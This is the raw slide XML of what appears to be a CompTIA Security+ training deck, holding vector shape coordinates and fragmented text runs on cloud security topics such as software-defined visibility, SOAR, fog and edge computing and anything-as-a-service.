                    <a:pt x="2402268" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230247" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205228" y="374142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230247" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402268" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1859279">
                  <a:moveTo>
                    <a:pt x="5155692" y="1485138"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1110996"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1113917"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1122426"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1136192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1154836"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1178039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1205433"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1236662"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1271397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1309255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1349921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1393024"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1438211"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4411980" y="1485138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4414875" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4423334" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4436999" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4455541" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478604" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4505820" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536872" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4571390" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4609020" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4649432" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4692269" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4737189" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783836" y="1859280"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4830470" y="1856371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4875390" y="1847862"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4918227" y="1834095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958639" y="1815452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4996269" y="1792249"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030787" y="1764855"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061839" y="1733626"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5089055" y="1698891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112118" y="1661033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130660" y="1620367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144325" y="1577263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1532077"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5155692" y="1485138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8003540" y="4653153"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>02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97422" y="5662929"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>01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209656" y="5763514"/>
            <a:ext cx="3429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0" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>03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10992" y="5171338"/>
            <a:ext cx="2520315" cy="11823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14999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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helps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baseli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e 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monitoring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and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anomal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det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ec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ion.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86761" y="1756298"/>
            <a:ext cx="12090400" cy="2358390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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Software-defined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visibility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near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real-time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collection,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aggregation,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reporting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data.</a:t>
            </a:r>
            <a:endParaRPr sz="2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1395"/>
              </a:spcBef>
            </a:pP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uses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software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defined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visibility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as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follows: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50">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="4594225" marR="4905375" indent="1905">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc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It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supports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east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 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west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z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t.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27130" y="5080406"/>
            <a:ext cx="2935605" cy="15684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14999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef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im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p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lements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Sec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rity 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Orchestration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and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Aut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mat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Response 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(SOAR).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40044" y="306451"/>
            <a:ext cx="437451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70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fog</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and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75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Edge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140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Computing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0723" y="760476"/>
            <a:ext cx="6192012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527552" y="1933193"/>
            <a:ext cx="960501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Fog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edge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computing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enhance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availability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with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low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latency.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31948" y="3927347"/>
            <a:ext cx="5133340" cy="3293745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5133340" h="3293745">
                <a:moveTo>
                  <a:pt x="4814951" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="317881" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270917" y="3447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226089" y="13462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183890" y="29552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144812" y="51224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109346" y="77986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77986" y="109346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51224" y="144812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29552" y="183890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="226089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3447" y="270917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="317880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2975483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3447" y="3022446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="3067274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29552" y="3109473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51224" y="3148551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77986" y="3184017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109346" y="3215377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144812" y="3242139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183890" y="3263811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226089" y="3279901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270917" y="3289916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317881" y="3293364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4814951" y="3293364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4861914" y="3289916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4906742" y="3279901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4948941" y="3263811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4988019" y="3242139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5023485" y="3215377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5054845" y="3184017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5081607" y="3148551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5103279" y="3109473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5119369" y="3067274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5129384" y="3022446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5132832" y="2975483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5132832" y="317880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5129384" y="270917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5119369" y="226089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5103279" y="183890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5081607" y="144812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5054845" y="109346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5023485" y="77986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4988019" y="51224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4948941" y="29552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4906742" y="13462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4861914" y="3447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4814951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803398" y="4540758"/>
            <a:ext cx="4500245" cy="203708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55600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Provision greater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processing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sourc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bet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ween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edg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 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center</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="190500" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2630"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Prioritize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analysis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and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alert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conditions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333231" y="3927347"/>
            <a:ext cx="5434965" cy="3293745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5434965" h="3293745">
                <a:moveTo>
                  <a:pt x="5116703" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="317881" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270917" y="3447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226089" y="13462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183890" y="29552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144812" y="51224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109346" y="77986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77986" y="109346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51224" y="144812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29552" y="183890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="226089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3447" y="270917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="317880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2975483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3447" y="3022446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="3067274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29552" y="3109473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51224" y="3148551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77986" y="3184017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="109346" y="3215377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144812" y="3242139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183890" y="3263811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226089" y="3279901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="270917" y="3289916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="317881" y="3293364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5116703" y="3293364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163666" y="3289916"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208494" y="3279901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5250693" y="3263811"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5289771" y="3242139"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5325237" y="3215377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5356597" y="3184017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5383359" y="3148551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5405031" y="3109473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5421121" y="3067274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5431136" y="3022446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5434583" y="2975483"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5434583" y="317880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5431136" y="270917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5421121" y="226089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5405031" y="183890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5383359" y="144812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5356597" y="109346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5325237" y="77986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5289771" y="51224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5250693" y="29552"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208494" y="13462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163666" y="3447"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5116703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505570" y="4540758"/>
            <a:ext cx="4004945" cy="69723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355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Defi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additiona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z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nes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-14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 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processing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nodes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05570" y="5546852"/>
            <a:ext cx="4636770" cy="10325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55600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100200"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="63636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Us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edg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device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z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ne,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ed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e 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gat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way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60">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,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fog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nodes,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nter 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concept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edg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computi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7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31948" y="3326891"/>
            <a:ext cx="5133340" cy="722630"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5133340" h="722629">
                <a:moveTo>
                  <a:pt x="5012435" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="120395" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73509" y="9453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35242" y="35242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9453" y="73509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="120396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="601980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9453" y="648866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35242" y="687133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="73509" y="712922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120395" y="722376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5012435" y="722376"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5059322" y="712922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5097589" y="687133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5123378" y="648866"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5132832" y="601980"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5132832" y="120396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5123378" y="73509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5097589" y="35242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5059322" y="9453"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5012435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198111" y="3494913"/>
            <a:ext cx="200152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85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Fo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-85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Comp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55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85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ting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333231" y="3326891"/>
            <a:ext cx="5436235" cy="772795"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5436234" h="772795">
                <a:moveTo>
                  <a:pt x="5307330" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128777" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37719" y="37718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="128778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="643890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10120" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37719" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78652" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128777" y="772668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5307330" y="772668"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5357455" y="762547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5398389" y="734949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5425987" y="694015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5436108" y="643890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5436108" y="128778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5425987" y="78652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5398389" y="37719"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5357455" y="10120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5307330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9965563" y="3520186"/>
            <a:ext cx="217297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Edg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Comp</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-55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85">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ting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02508" y="1187196"/>
            <a:ext cx="3974591" cy="36575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07916" y="784098"/>
            <a:ext cx="272605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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaways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2086355"/>
            <a:ext cx="457200" cy="4572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3020567"/>
            <a:ext cx="457200" cy="4572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4277867"/>
            <a:ext cx="457200" cy="4572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5535167"/>
            <a:ext cx="457200" cy="45719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385697" y="2263266"/>
            <a:ext cx="8501380" cy="54006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Cloud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service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models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referred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anything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as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service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(XaaS).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3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Application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virtualization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involved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hosting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streaming</a:t>
            </a:r>
            <a:endParaRPr sz="2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individual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software.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7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cloud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storage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security,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compute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component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refers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endParaRPr sz="2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dirty="0" sz="2200" spc="10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>CPU</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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system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memory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resources.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dirty="0" sz="2200" spc="1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er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v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provis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comp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el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abstracte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from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endParaRPr sz="2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hardware</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-160">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>,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OS,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platfo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m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layers.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100">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1067435">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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Visibility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near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real-time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collection,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aggregation,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and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reporting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data.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6710171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0960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8333740" marR="5080" indent="-2419350">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="170"/>
              <a:t>Com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55"/>
              <a:t>TI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65"/>
              <a:t>Security+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70"/>
              <a:t>Certificatio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
